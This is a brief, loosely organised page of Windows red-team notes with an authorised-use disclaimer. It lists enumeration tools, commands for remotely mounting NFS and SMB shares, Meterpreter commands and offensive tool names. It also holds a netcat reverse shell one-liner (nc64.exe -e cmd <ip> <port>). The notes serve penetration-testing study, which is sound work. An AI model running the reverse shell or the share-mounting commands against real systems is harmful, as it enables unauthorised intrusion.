windows-redteam

description: Sorted Linux notes, need to separate to different pages and reorganize

Red Team Notes

{% hint style="success" %} Hack Responsibly.

Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

Living off the land binaries: LOLBAS

Enumeration

Windows Privilege Escalation Enumeration Script: WinPEAS

Little bit o' everything: PowerSploit

Shares

Mounting NFS Shares Remotely

{% embed url="https://resources.infosecinstitute.com/exploiting-nfs-share/" %}

showmount -e <ip>
<list of mounts>
mkdir /tmp/<foldername>
mount -t nfs <ip>:/<mount-folder> /tmp/<foldername>

Using smbmount

smbmount //$IP/$share /mnt/remote/ -o username=$user,password=$pass,rw

Where /mnt/remote is the local folder to mount the share to.

Unsorted

Netcat reverse shell (after uploading the binary!): nc64.exe -e cmd <ip> <port>

5KFB6 tools: https://specterops.io/resources/research-and-development

easy windows shell: unicorn.py (trustedsec/unicorn), HackTheBox - Arctic

system information: sysinfo

Get user id: getuid

PowerShell privilege escalation:

fuzzbunch: exploit tool similar to metasploit

check what updates are installed: type WindowsUpdate.log

net use share from linux [like SimpleHTTPServer for Samba]: impacket-smbserver <sharename> '<dir_to_share>'
